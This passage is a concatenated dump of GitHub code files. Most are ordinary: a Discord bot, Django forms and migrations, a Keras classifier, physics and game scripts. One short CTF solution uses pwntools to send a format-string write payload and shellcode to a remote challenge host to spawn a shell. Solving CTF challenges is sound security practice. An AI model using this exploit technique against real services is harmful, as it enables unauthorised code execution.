Cols()\n self.handlers = Handlers(self.bot)\n self.interactions = interactions\n\n @commands.command()\n @commands.guild_only()\n async def reset(self, ctx):\n m = await ctx.send(embed=loading_embed)\n if isinstance(await self.handlers.checkPerms(ctx, m, \"manage_guild\", self.emojis().punish.warn, \"reset settings\", me=False), Failed):\n return\n v = self.interactions.createUI(ctx, [\n self.interactions.Button(self.bot, emojis=self.emojis, id=\"ye\", title=\"Yes\", style=\"success\"),\n self.interactions.Button(self.bot, emojis=self.emojis, id=\"no\", title=\"No\", style=\"danger\"),\n ])\n await m.edit(embed=discord.Embed(\n title=\"Are you sure\",\n description=f\"By clicking Yes, all of your server settings will be reset. This cannot be reversed.\",\n colour=self.colours.red\n ), view=v)\n await v.wait()\n if v.selected == \"ye\":\n self.handlers.fileManager(ctx.guild, action=\"RESET\")\n return await m.edit(embed=discord.Embed(\n title=\"Reset\",\n description=f\"All settings reset successfully\",\n colour=self.colours.green\n ), view=None)\n await m.edit(embed=discord.Embed(\n title=\"Reset\",\n description=f\"Cancelled\",\n colour=self.colours.green\n ), view=None)\n\n\ndef setup(bot):\n bot.add_cog(Reset(bot))\n","repo_name":"ClicksMinutePer/rsm","sub_path":"cogs/commands/reset.py","file_name":"reset.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"73636902120","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Estudiante',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nombre', models.CharField(max_length=50)),\n ('codigo', models.CharField(max_length=7)),\n ('numero_documento', models.CharField(max_length=10)),\n ('nivel', models.CharField(max_length=25, choices=[(b'posgrado', b'Posgrado'), (b'pregrado', b'Pregrado')])),\n ],\n ),\n migrations.CreateModel(\n name='Facultad',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nombre_facultad', models.CharField(max_length=50)),\n ],\n ),\n migrations.CreateModel(\n name='Pazy',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('fecha_creacion', models.DateField()),\n ('consecutivo', models.CharField(max_length=25)),\n ('estudiante', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Programa',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nombre_programa', models.CharField(max_length=100)),\n ('codigo', models.CharField(max_length=6)),\n ],\n ),\n migrations.AddField(\n model_name='estudiante',\n name='Facultad',\n field=models.ForeignKey(to='pazys.Facultad'),\n ),\n migrations.AddField(\n model_name='estudiante',\n name='User',\n field=models.ForeignKey(to=settings.AUTH_USER_MODEL),\n ),\n migrations.AddField(\n model_name='estudiante',\n name='programa',\n field=models.ForeignKey(to='pazys.Programa'),\n ),\n ]\n","repo_name":"arcegk/biblioteca","sub_path":"projects/ingsoft/biblioteca/pazys/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34256709184","text":"from django.forms import ModelForm, widgets, ValidationError, ChoiceField, ModelChoiceField, DateInput, TextInput, ModelMultipleChoiceField\nfrom chittabook.models.userprofile import UserProfile\nfrom django_countries.widgets import CountrySelectWidget\nfrom bootstrap_datepicker_plus.widgets import DatePickerInput, DateTimePickerInput\nfrom datetime import date\nfrom chittabook.models.accounts import Account, BankAccount, LoanAccount, CreditCard, InvestmentAccount\nfrom chittabook.models.categories import Category\nfrom chittabook.models.transactions import Transaction\nfrom django.utils.html import format_html\nfrom django.utils import timezone\nfrom django.db.models import QuerySet\nfrom django.db import models\n\n\n# create userprofile model form\nclass UserProfileForm(ModelForm):\n class Meta:\n model = UserProfile\n fields = ['name', 'dob', 'profession', 'gender', 'country']\n widgets = {\n 'dob': TextInput( \n attrs={'type': 'date'} \n ),\n 'country': CountrySelectWidget()\n }\n\n # custom validation for dob\n def clean(self):\n cleaned_data = super().clean()\n dob = cleaned_data.get(\"dob\")\n\n if dob > date.today():\n raise ValidationError(\"Date of Birth cannot be in the future.\")\n elif dob == date.today():\n raise ValidationError(\"Date of Birth cannot be today.\")\n \n # dob cannot be less than 13 years old\n today = date.today()\n age = int(today.year) - int(dob.year) - ((int(today.month), int(today.day)) < (int(dob.month), int(dob.day)))\n\n if int(age) < 18:\n raise ValidationError(\"Date of Birth cannot be less than 13 years.\")\n elif int(age) > 100:\n raise ValidationError(\"Date of Birth cannot be greater than 100 years.\")\n \n return cleaned_data\n \n \n\n\n# Bank Account form\nclass BankAccountForm(ModelForm):\n class Meta:\n model = BankAccount\n fields = '__all__'\n exclude = ['user', 'currency', 'created_at']\n\n\n\n# Credit Cards form\nclass CreditCardForm(ModelForm):\n class Meta:\n model = CreditCard\n fields = '__all__'\n exclude = ['user', 'debt', 'currency', 'created_at']\n labels = {\n 'balance': 'Initial Debt',\n 'account_name': 'Credit Card Name',\n }\n\n\n\n# Loan Account form\nclass LoanAccountForm(ModelForm):\n class Meta:\n model = LoanAccount\n fields = '__all__'\n exclude = ['user', 'currency', 'created_at']\n\n\n\n# Investment Account form\nclass InvestmentAccountForm(ModelForm):\n class Meta:\n model = InvestmentAccount\n fields = '__all__'\n exclude = ['user', 'currency', 'created_at']\n\n\n\n# Transaction form\nclass TransactionForm(ModelForm):\n \n account = ModelChoiceField(queryset=Account.objects.none())\n\n \n class Meta:\n model = Transaction\n fields = '__all__'\n exclude = ['user', 'balance_after', 'created_at', 'currency']\n widgets = {\n 'date': TextInput( \n attrs={\n 'type': 'date',\n 'max': date.today().isoformat()\n } \n ),\n }\n\n account = ChoiceField(choices=[], required=True, label='Select Account')\n \n # custom initialization\n def __init__(self, *args, **kwargs):\n self.request = kwargs.pop('request', None)\n super(TransactionForm, self).__init__(*args, **kwargs)\n self.fields['account'].choices = self.get_account_choices()\n self.fields['category'].queryset = Category.objects.filter(user=self.request.user) # set initial queryset to none and used htmx request to populate the fields based on the selected tab\n\n \n # Account choices function\n def get_account_choices(self):\n bank_accounts = BankAccount.objects.filter(user=self.request.user)\n credit_cards = CreditCard.objects.filter(user=self.request.user)\n loan_accounts = LoanAccount.objects.filter(user=self.request.user)\n investment_accounts = InvestmentAccount.objects.filter(user=self.request.user)\n\n account_choices = []\n\n if bank_accounts:\n account_choices.append(('Bank Accounts', [(a.id, a.account_name) for a in bank_accounts]))\n\n if credit_cards:\n account_choices.append(('Credit Cards', [(a.id, a.account_name) for a in credit_cards]))\n\n if loan_accounts:\n account_choices.append(('Loan Accounts', [(a.id, a.account_name) for a in loan_accounts]))\n\n if investment_accounts:\n account_choices.append(('Investment Accounts', [(a.id, a.account_name) for a in investment_accounts]))\n\n return account_choices\n \n \n # clean function to convert account available choices\n def clean(self):\n cleaned_data = super().clean()\n account_id = cleaned_data.get('account')\n \n # override account instance data and clean it\n try:\n account_instance = Account.objects.get(id=account_id)\n cleaned_data['account'] = account_instance\n except Account.DoesNotExist:\n raise ValidationError('Invalid account choice.')\n \n return cleaned_data\n \n\n ","repo_name":"rajeevreddyms5/capstone","sub_path":"chittabook/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"708371592","text":"# from __future__ import print_function\nwhile True:\n try:\n print(\"Let us solve the equation(x/2}/(x-y)\")\n x = float(input(\"Please enter a value of x:\"))\n y = float(input(\"Please enter a value of y:\"))\n if x == 0 or y == 0:\n break\n z = (x/2)/(x-y)\n print(\"Solving (x/2)/(x-y) for value x =\",x,\"and y\",y,\"we will get the result:\",z)\n except:\n print(\"There was an error with the code\")","repo_name":"rovinpokharel/basicPython","sub_path":"error.py","file_name":"error.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36278965035","text":"import os\nimport torch\nimport argparse\nimport numpy as np\nfrom collections import defaultdict\nfrom mmcv import Config\nfrom mmcv.runner import load_checkpoint, init_dist, get_dist_info\nfrom mmcv.parallel import MMDistributedDataParallel\nfrom mmdet.apis import set_random_seed, multi_gpu_test\nfrom mmdet3d.models import build_model\nfrom mmdet3d.datasets import build_dataloader, build_dataset\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='MMDet test (and eval) a 5 models 5 times')\n parser.add_argument('config', help='config file')\n parser.add_argument('checkpoint', help='checkpoints directory')\n parser.add_argument(\n '--launcher',\n choices=['none', 'pytorch', 'slurm', 'mpi'],\n default='none',\n help='job launcher')\n parser.add_argument('--local_rank', type=int, default=0)\n args = parser.parse_args()\n if 'LOCAL_RANK' not in os.environ:\n os.environ['LOCAL_RANK'] = str(args.local_rank)\n return args\n\n\ndef main():\n args = parse_args()\n cfg = Config.fromfile(args.config)\n init_dist(args.launcher, **cfg.dist_params)\n checkpoints = tuple(filter(lambda x: x.endswith('.pth'), os.listdir(args.checkpoint)))\n print('found checkpoints: ', checkpoints)\n metrics = defaultdict(list)\n model = build_model(cfg.model, test_cfg=cfg.get('test_cfg'))\n model = MMDistributedDataParallel(\n model.cuda(),\n device_ids=[torch.cuda.current_device()],\n broadcast_buffers=False)\n for i, checkpoint in enumerate(checkpoints):\n load_checkpoint(model, os.path.join(args.checkpoint, checkpoint), map_location='cpu')\n for j in range(5):\n set_random_seed(j * 111)\n dataset = build_dataset(cfg.data.test)\n data_loader = build_dataloader(\n dataset,\n samples_per_gpu=1,\n workers_per_gpu=cfg.data.workers_per_gpu,\n dist=True,\n shuffle=False)\n outputs = multi_gpu_test(model, data_loader)\n if get_dist_info()[0] == 0:\n for k, v in dataset.evaluate(outputs).items():\n metrics[k].append(v)\n\n if get_dist_info()[0] == 0:\n for k in ('mAP_0.25', 'mAP_0.50'):\n print(k, 'min, mean, max:', np.min(metrics[k]), np.mean(metrics[k]), np.max(metrics[k]))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SamsungLabs/fcaf3d","sub_path":"tools/test5x5.py","file_name":"test5x5.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","stars":200,"dataset":"github-code","pt":"18"} +{"seq_id":"16784024003","text":"Sec0 = [\"P1\", \"P1\", \"P2\", \"P2\", \"P1\", \"P2\", \"P1\", \"P1\"]\nSec1 = [\"P1\", \"P1\", \"P2\", \"P2\", \"P1\", \"P2\", \"P2\", \"P2\"]\nsec2 = [\"P1\", \"P1\", \"P2\", \"P2\", \"P1\", \"P2\", \"P1\", \"P1\", \"P2\", \"P1\"]\nsec3 = [\"P1\", \"P1\"]\n\n\ndef juego(secuencia):\n game = [\"Love\", \"15\", \"30\", \"40\"]\n fin = False\n error = False\n P1 = 0\n P2 = 0\n\n lon = len(secuencia)\n for i in range(0, (lon)):\n error = fin\n P1 += 1 if secuencia[i] == \"P1\" else 0\n P2 += 1 if secuencia[i] == \"P2\" else 0\n\n if P1 >= 3 and P2 >= 3:\n if not fin and abs(P1-P2) <= 1:\n print(\"Deuce\" if P1 == P2 else\n \"Ventaja P1\"if P1 > P2 else \"Ventaja P2\")\n else:\n fin = True\n else:\n if P1 < 4 or P2 < 4:\n print(f\"{game[P1]}-{game[P2]}\")\n else:\n fin = True\n\n print(\"Puntos no validos\"if error else\n \"Ha ganado P1\" if P1 > P2 else \"Ha ganado P2\")\n\n\njuego(Sec0)\njuego(Sec1)\njuego(sec2)\njuego(sec3)\n","repo_name":"Aldroide/Retos","sub_path":"Reto #02 Partido de Tenis/JuegoTenis.py","file_name":"JuegoTenis.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9211770851","text":"def nSequenza(seq, studseq, n):\n seq = list(map(int, seq))\n studseq = list(map(int, studseq))\n\n i = 0\n j = 0\n ripensamento = 0\n for i in range(1,len(studseq)):\n if studseq[i] < studseq[i - 1]:\n ripensamento += 1\n while i != n and j != len(seq):# and ripensamento <= 1:\n if studseq[i] == seq[j]:\n i += 1\n j += 1\n else:\n j += 1\n if i == n:\n if ripensamento < 2:\n stringa = (\"Si. Totalizzeresti [1 safe pt], [9 possible pt], [0 out of reach pt].
N-sottosequenza fornita è un certificato valido: \" + str(studseq) + \"
Mi hai convinto che la massima lunghezza di una N-sottosequenza è almeno \" + str(n)+\".\")\n else:\n stringa = (\"No. Totalizzeresti [0 safe pt], [0 possible pt], [10 out of reach pt].
Hai inserito \" + str(studseq)+\"
Hai avuto troppi ripensamenti.\")\n return stringa\n else:\n stringa = (\"No. Totalizzeresti [0 safe pt], [0 possible pt], [10 out of reach pt].
Hai inserito \" + str(studseq) + \" che non è una sottosequenza di s: \" + str(seq) + \".\")\n return stringa\n","repo_name":"romeorizzi/eduexams","sub_path":"Applet/exercise_2/verifier/nSeq.py","file_name":"nSeq.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"it","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"25364957325","text":"import keras\nimport tensorflow as tf\nfrom keras.utils import to_categorical\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.utils import shuffle\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom numpy import where\nimport numpy as np\nimport pandas as pd\nimport sys\n\ntestCsv = str(sys.argv[1])\n\n\ndef prepare_data(name, csv_path, shuf, scal):\n labels = []\n print('')\n print(csv_path)\n df = pd.read_csv(csv_path)\n\n if shuf:\n df = shuffle(df)\n\n # df.to_csv(name + '.csv')\n\n for i in range(df.shape[0]):\n if df.iloc[i, 0] == 1:\n labels.append(1)\n else:\n labels.append(0)\n\n y = np.array(labels).astype(int)\n\n # drop label and name column\n df = df.drop(df.columns[[0, 1]], axis=1).astype('float32')\n X = df.to_numpy()\n\n if scal:\n X = StandardScaler().fit_transform(X)\n dfn = pd.DataFrame.from_records(X)\n # dfn.to_csv('out_features_scaled.csv')\n\n print('')\n # print(X)\n print('X_' + name + '_dim: ' + str(X.shape))\n # print(y)\n print('y_' + name + '_dim: ' + str(y.shape))\n\n return X, y\n\n\ndef get_classifier():\n classfr = Sequential()\n classfr.add(Dense(9, input_dim=18, activation='relu'))\n classfr.add(Dense(3, activation='relu'))\n classfr.add(Dense(9, activation='relu'))\n classfr.add(Dense(2, activation='softmax')) # real: [1, 0], spoof: [0, 1]\n return classfr\n\n\ndef to_categorical_fixed(testy):\n testy_one_hot = np.zeros((testy.size, 2))\n for i in range(testy.size):\n if testy[i] == 1:\n testy_one_hot[i][0] = 1\n else:\n testy_one_hot[i][1] = 1\n return testy_one_hot\n\n\ntestX, testyy = prepare_data('test', testCsv, False, False)\n\ntesty_one_hotx = to_categorical_fixed(testyy)\n\nclassifier = get_classifier()\nclassifier.load_weights('classifier_weights.h5')\npredicted_y = classifier.predict(testX)\npredicted_y = np.rint(predicted_y)\n\nres = np.sum(np.absolute(testy_one_hotx - predicted_y.astype(float)), axis=1)\nitems_correct = res[res == 0]\ntest_acc = float(items_correct.size) / float(res.size)\nprint('Test: %.3f' % test_acc)\npredicted_y = predicted_y.astype(float)\nrealsamples_expected = np.where(testy_one_hotx[:, 0] == 1)\nrealsamples_actual = predicted_y[realsamples_expected[0]]\nrealsamples_spoofs = np.where(realsamples_actual[:, 0] == 0)\nbpcer = float(len(realsamples_spoofs[0])) / float(len(realsamples_expected[0])) # real misclassified as spoof\n\nspoofsamples_expected = np.where(testy_one_hotx[:, 1] == 1)\nspoofsamples_actual = predicted_y[spoofsamples_expected[0]]\nspoofsamples_real = np.where(spoofsamples_actual[:, 1] == 0)\napcer = float(len(spoofsamples_real[0])) / float(len(spoofsamples_expected[0])) # spoof misclassified as real\n\nprint('bpcer: {:.3f}, realsamples expected: {:d}, realsamples mistaken for spoofs: {:d}'.format(bpcer, len(\n realsamples_expected[0]), len(realsamples_spoofs[0])))\nprint('apcer: {:.3f}, spoofsamples expected: {:d}, spoofsamples mistaken for real: {:d}'.format(apcer, len(\n spoofsamples_expected[0]), len(spoofsamples_real[0])))\n","repo_name":"joelpou/pydatatools","sub_path":"ml/classifier_inference.py","file_name":"classifier_inference.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41774454799","text":"from pwn import *\nimport re\ncontext(arch=\"amd64\",os=\"linux\",log_level=\"debug\")\np=remote(\"111.198.29.45\",42278)\nxx=p.recvuntil(\"name be:\")\ns_addr1=re.findall(r\"is (.+?)\\n\",xx)[0]\ns_addr=int(\"0x\"+s_addr1,16)\np.sendline(\"abc\")\np.sendlineafter(\"up?:\",\"east\")\np.sendlineafter(\"leave(0)?:\",\"1\")\np.sendlineafter(\"an address\",str(s_addr))\np.recvuntil(\"wish is:\")\npayload=\"A\"*8+\".%p\"*10\npayload=\"%85s%9$n\"+p64(s_addr)\np.sendline(payload)\np.recvuntil(\"YOU SPELL\")\np.sendline(asm(shellcraft.sh()))\np.interactive()\n","repo_name":"go1me/ctf","sub_path":"xctf/pwn/string/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41185094635","text":"from MutableContract import MutableContract\n\nmut_contract = MutableContract('original.sol')\n\n# Defining state variable\nmut_contract.insert_code_at(mut_contract.token.Contract.head,\n b'uint256 public EchidnaVar;',\n where='within.start')\n\n# Assigning the state variable in the constructor\nmut_contract.insert_code_at(mut_contract.token.Contract.functions.constructor,\n b'EchidnaVar = 10;',\n where='within.end')\n\n# Adding a variable before a function, in this case it will add it to the state vars\n# before seems pretty useless between functions..\nmut_contract.insert_code_at(mut_contract.token.Contract.functions.constructor,\n b'uint256 public pairAdd;',\n where='before')\n\n# Insert at the start of a function, in this case to limit a burn call\nmut_contract.insert_code_at(mut_contract.token.Contract.functions._burn,\n b'require(msg.sender == 0xdAC17F958D2ee523a2206206994597C13D831ec7);',\n where='within')\n\n# Insert Echidna test code at the end of the contract.\nmut_contract.insert_code_at(mut_contract.token.Contract.tail,\n '''function echidna_check_balance() public returns(bool) {\n return msg.sender.balance < EchidnaVar;\n }'''.encode('utf-8'),\n where='within')\n\n# Insert an interface before the contract, can also be after for example\nmut_contract.insert_code_at(mut_contract.token.Contract,\n '''interface CoolInterface {\n function magic() external pure returns (uint256);\n}\n'''.encode('utf-8'),\n where='before')\n\n\n\nmut_contract.dump()\n","repo_name":"AstraGodz/MutableContract","sub_path":"simpleExample.py","file_name":"simpleExample.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27412184419","text":"import grid\nimport math as m\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\ndef delta(theta, phi, x, y, z, wavelen):\n ans = (m.sin(theta) * (x * m.cos(phi) + y * m.sin(phi)) + z * m.cos(theta) - z) * 2 * m.pi / wavelen\n return ans\n\n\ndef intence(points, spacing, nangle, wavelen):\n gr = grid.make_grid(points, spacing)\n intenses = np.empty([nangle, nangle], float)\n cosum = 0.\n sinsum = 0.\n theta = np.linspace(0, np.pi, nangle)\n phi = np.linspace(0, 2 * np.pi, nangle)\n for i, t in enumerate(theta):\n for j, p in enumerate(phi):\n for k in range(points ** 3):\n x = gr[k][0]\n y = gr[k][1]\n z = gr[k][2]\n cosum = cosum + m.cos(delta(t, p, x, y, z, wavelen))\n sinsum = sinsum + m.sin(delta(t, p, x, y, z, wavelen))\n intenses[i][j] = m.sqrt(cosum ** 2 + sinsum ** 2)\n return intenses\n\n\ndef intencity(points, spacing, nangle, wavelen, taf):\n gr = grid.make_grid(points, spacing)\n intenses = np.empty([nangle, nangle], float)\n cosum = 0.\n sinsum = 0.\n theta = np.linspace(0, np.pi, nangle)\n phi = np.linspace(0, 2 * np.pi, nangle)\n for i, t in enumerate(theta):\n for j, p in enumerate(phi):\n for k in range(points ** 3):\n x = gr[k][0]\n y = gr[k][1]\n z = gr[k][2]\n cosum = cosum + m.cos(delta(t, p, x, y, z, wavelen))\n sinsum = sinsum + m.sin(delta(t, p, x, y, z, wavelen))\n arg_af = m.sin(t) / wavelen\n intenses[i][j] = m.sqrt(m.sqrt(cosum ** 2 + sinsum ** 2) * atom_factor(arg_af, taf) * spacing)\n print(atom_factor(arg_af, taf))\n return intenses\n\n\ndef atom_factor(arg, taf):\n dh = 0.05\n imax = 29\n if arg >= 0:\n i = m.trunc(arg / dh)\n if i > imax:\n return 0\n else:\n dx = (arg % dh)\n return taf[i] + (taf[i+1] - taf[i]) * dx\n\n\n\ndef int_show(points, spacing, nangle, wavelen):\n values = intence(points, spacing, nangle, wavelen)\n\n # Drawing data points\n phi = np.linspace(0, 2 * np.pi, 180)\n theta = np.linspace(0, np.pi, 180)\n #\n\n # Generate drawing two-dimensional data\n p, t = np.meshgrid(phi, theta)\n\n plt.figure(figsize=(5, 5))\n ax = plt.subplot(projection='polar')\n ax.contourf(p, t, values, cmap='gray')\n plt.grid(c='black')\n\n plt.show()\n\n\ndef atom_factor0(arg, taf):\n dh = 0.05\n imax = 29\n if arg >= 0:\n i = m.trunc(arg/dh)\n if i > imax:\n Result=0\n else:\n dx = (arg % dh)\n Result=taf[i]+(taf[i+1]-taf[i])*dx\n return Result\n\n\ndef Intensity1(A, L, T, Fi, c, taf):\n k= 2 * m.pi / L\n SinT = m.sin(T)\n CosT = m.cos(T)\n SinFi = m.sin(Fi)\n CosFi=m.cos(Fi)\n ReA=0\n ImA=0\n for i in range(len(c)):\n Arg=k*(SinT*(c[i][0]*CosFi+c[i][1]*SinFi)+c[i][2]*CosT-c[i][2])\n ReA= ReA + m.cos(Arg)\n ImA=ImA + m.sin(Arg)\n Sum = m.sqrt(ReA*ReA+ImA*ImA)\n ArgAF = m.sin(T)/L\n F = atom_factor0(ArgAF, taf)\n return m.sqrt(A*F*Sum)\n\n\ndef integral_inten(points, spacing, nangle, wavelen, taf, brave):\n gr = grid.make_grid(points, spacing)\n intenses = np.empty([nangle, nangle], float)\n theta = np.linspace(0, np.pi, nangle)\n phi = np.linspace(0, 2 * np.pi, nangle)\n for i, t in enumerate(theta):\n for j, p in enumerate(phi):\n intenses[i][j] = Intensity1(1, wavelen, t, p, gr, taf)\n return intenses","repo_name":"multsidar/difraction_my_trys_multsidar","sub_path":"Intence.py","file_name":"Intence.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19174777572","text":"from components.ui.window import create_window\nfrom math import ceil\nfrom components.entity import Entity\nfrom components.sprite import Sprite\nfrom components.ui.window import Window\nfrom components.label import Label\n\nitems_per_row = 5\npadding_size = 5\ngap_size = 5\nitem_size = 32\n\nclass InventoryView:\n def __init__(self, inventory, slot_image=\"inventory_slot.png\"):\n from core.engine import engine\n self.inventory = inventory\n self.slot_image = slot_image\n\n width = padding_size + (items_per_row * item_size) + ((items_per_row-1 ) * gap_size) + padding_size\n rows = ceil(inventory.capacity / items_per_row)\n height = padding_size + (rows * item_size) + ((rows-1) * gap_size) + padding_size\n\n from core.camera import camera\n x = camera.width - width\n y = 0\n\n self.window = create_window(x, y, width, height)\n self.slot_container_sprites = []\n self.slot_sprites = []\n\n inventory.listener = self\n\n self.render()\n\n def render(self):\n print(\"Called render\")\n row = 0\n column = 0\n for slot in self.inventory.slots:\n x = column * (item_size + gap_size) + self.window.x + padding_size\n y = row * (item_size + gap_size) + self.window.y + padding_size\n container_sprite = Entity(Sprite(self.slot_image, True), x=x, y=y)\n self.window.get(Window).items.append(container_sprite)\n if slot.type is not None:\n print(slot.type.name)\n item_sprite = Entity(Sprite(slot.type.icon_name, True), x=x, y=y)\n if slot.type.stack_size > 1:\n label = Entity(Label(\"EBGaramond-ExtraBold.ttf\", str(slot.amount), color=(255, 255, 0), size=30), x=x, y=y)\n self.window.get(Window).items.append(label)\n self.window.get(Window).items.append(item_sprite)\n column += 1\n if column >= items_per_row:\n column = 0\n row += 1\n\n\n def clear(self):\n for i in self.window.get(Window).items:\n if i.has(Sprite):\n i.get(Sprite).breakdown()\n elif i.has(Label):\n i.get(Label).breakdown()\n self.window.get(Window).items.clear()\n\n\n def refresh(self):\n self.clear()\n self.render()\n\n def breakdown(self):\n pass\n\n","repo_name":"AlexanderFarrell/adventure_game_python","sub_path":"src/components/ui/inventory_view.py","file_name":"inventory_view.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9061951296","text":"from timeit import timeit, Timer\n\ndef sample_function():\n result = 0\n for i in range(100000):\n result = result + (i * i * i)\n return result\n\n\ntime_taken = timeit(sample_function, number = 1000)\nprint('total time:', time_taken, ', avarage time', time_taken/1000)\n\nprint('-' * 25)\n\ntimer = Timer(sample_function)\nprint(timer.timeit(number = 1000))\nprint(timer.repeat(repeat = 5, number=1000))\n\n","repo_name":"johnehunt/advancedpython3","sub_path":"profiling/timings2.py","file_name":"timings2.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"18"} +{"seq_id":"22234631055","text":"from fastapi import FastAPI, WebSocket\nfrom fastapi.responses import HTMLResponse\n\nfrom . import schemas\n\napp = FastAPI()\n\nmain_page = open('app/pages/index.html', 'r').read()\n\n@app.get(\"/\")\nasync def get():\n return HTMLResponse(main_page)\n\n@app.websocket(\"/ws\")\nasync def websocket_send_endpoint(websocket: WebSocket):\n await websocket.accept()\n\n ctr = 0\n while True:\n text = await websocket.receive_text()\n ctr += 1\n await websocket.send_json([{\n 'id': ctr,\n 'text': text\n }])\n","repo_name":"rinagert512/fastapi_websocket","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33551498885","text":"#Reference : https://www.linkedin.com/pulse/learn-looping-python-fun-text-based-games-doug-purcell/\nimport random\n\n# random_num is the number in range 1 ... 100\n\n# tries keep count of how many guesses player makes\n\ntries, random_num = 0, random.randint(1, 100)\n\nwhile True:\n\n print('Guess a number in the range of 1-100')\n\n your_guess = int(input())\n\n if your_guess > random_num:\n\n print('{} is greater than the random number X'.\n\n format(your_guess))\n\n tries += 1\n\n elif your_guess < random_num:\n\n print('{} is less than the random number X'.\n\n format(your_guess))\n\n tries += 1\n\n else:\n\n print('Congrats! {} is equal to the random number '\n\n '{}.'.format(your_guess, random_num))\n\n tries += 1\n\n print('It took you {} tries'.format(tries))\n\n break\n","repo_name":"akjalbani/Test_Python","sub_path":"Misc/Loops/guess_a_number.py","file_name":"guess_a_number.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"10644494529","text":"import collections\n\nclass Codec:\n \"\"\"\n 序列化:\n - 用BFS遍历树, 与一般遍历不同点是不管node的左右子节点是否存在,\n 统统加到队列中\n - 在节点出队时, 如果节点不存在, 在返回值res中加入一个\n null;如果节点存在, 则加入节点值的字符串形式\n\n 反序列化:\n - 同样使用BFS方法, 利用队列新建二叉树\n - 首先要将data转换成列表, 然后遍历,只要不为null将节点按顺序加入二叉树中;\n 同时还要将节点入队\n - 队列为空时遍历完毕, 返回根节点\n \"\"\"\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string.\n :type root: TreeNode\n :rtype: str\n \"\"\"\n if not root: return \"\"\n queue = collections.deque([root])\n res = []\n while queue:\n node = queue.popleft()\n if node:\n res.append(str(node.val))\n queue.append(node.left)\n queue.append(node.right)\n else:\n res.append('None')\n return '[' + ','.join(res) + ']'\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree.\n :type data: str\n :rtype: TreeNode\n \"\"\"\n if not data: return []\n dataList = data[1:-1].split(',')\n root = TreeNode(int(dataList[0]))\n queue = collections.deque([root])\n i = 1\n while queue:\n node = queue.popleft()\n if dataList[i] != 'None':\n node.left = TreeNode(int(dataList[i]))\n queue.append(node.left)\n i += 1\n if dataList[i] != 'None':\n node.right = TreeNode(int(dataList[i]))\n queue.append(node.right)\n i += 1\n return root\n","repo_name":"ShawnDong98/Algorithm-Book","sub_path":"leetcode/python/297.py","file_name":"297.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"628567272","text":"import numpy as np\n\nfrom PySide6.QtCore import QItemSelectionModel, QObject, Qt, Signal\nfrom PySide6.QtWidgets import QTableWidgetItem\n\nfrom hexrd.rotations import quatOfExpMap\n\nfrom hexrdgui.create_hedm_instrument import create_hedm_instrument\nfrom hexrdgui.fiber_pick_utils import _angles_from_orientation, _pick_to_fiber\nfrom hexrdgui.ui_loader import UiLoader\nfrom hexrdgui.utils import block_signals\n\n\nclass HandPickedFibersWidget(QObject):\n\n fiber_step_modified = Signal(float)\n\n def __init__(self, data, canvas, ax, parent=None):\n super().__init__(parent)\n\n loader = UiLoader()\n self.ui = loader.load_file('hand_picked_fibers_widget.ui', parent)\n\n self.data = data\n self.canvas = canvas\n self.ax = ax\n\n self._active = True\n\n self.cached_picked_spots = {}\n self.generated = 